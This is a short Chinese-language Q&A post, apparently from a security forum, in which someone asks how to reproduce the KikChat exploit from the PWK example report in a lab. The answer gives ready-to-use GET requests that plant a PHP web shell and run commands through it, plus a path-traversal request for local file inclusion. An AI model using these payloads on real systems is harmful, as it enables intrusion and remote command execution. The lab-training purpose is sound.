我在第7-14页上读到了关于PWK-Example-Report-v1.pdf的文章,发现在这个例子中使用了KikChat应用程序。
https://www.exploit-db.com/exploits/30235
易受攻击的应用程序的副本可在开发数据库获得。
但是,实际的利用代码/脚本不再存在。
我想知道上面的开发代码的内容是什么,因为我想在我的实验室中重现类似的场景。
发布于 2021-04-07 13:31:10
在您共享的链接上可以看到:https://www.exploit-db.com/exploits/30235
该漏洞可以通过简单的GET请求直接利用,因此不需要详细的攻击。
在/room/get.php上有一个RCE,您需要复制以下步骤才能创建一个名为shell.php的文件,该文件将是您的will:
http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM=<?php system($_GET['cmd']); ?>
http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;
名称参数上的/KikChat/private.php页面上也有一个LFI:
http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.inihttps://security.stackexchange.com/questions/248040
复制相似问题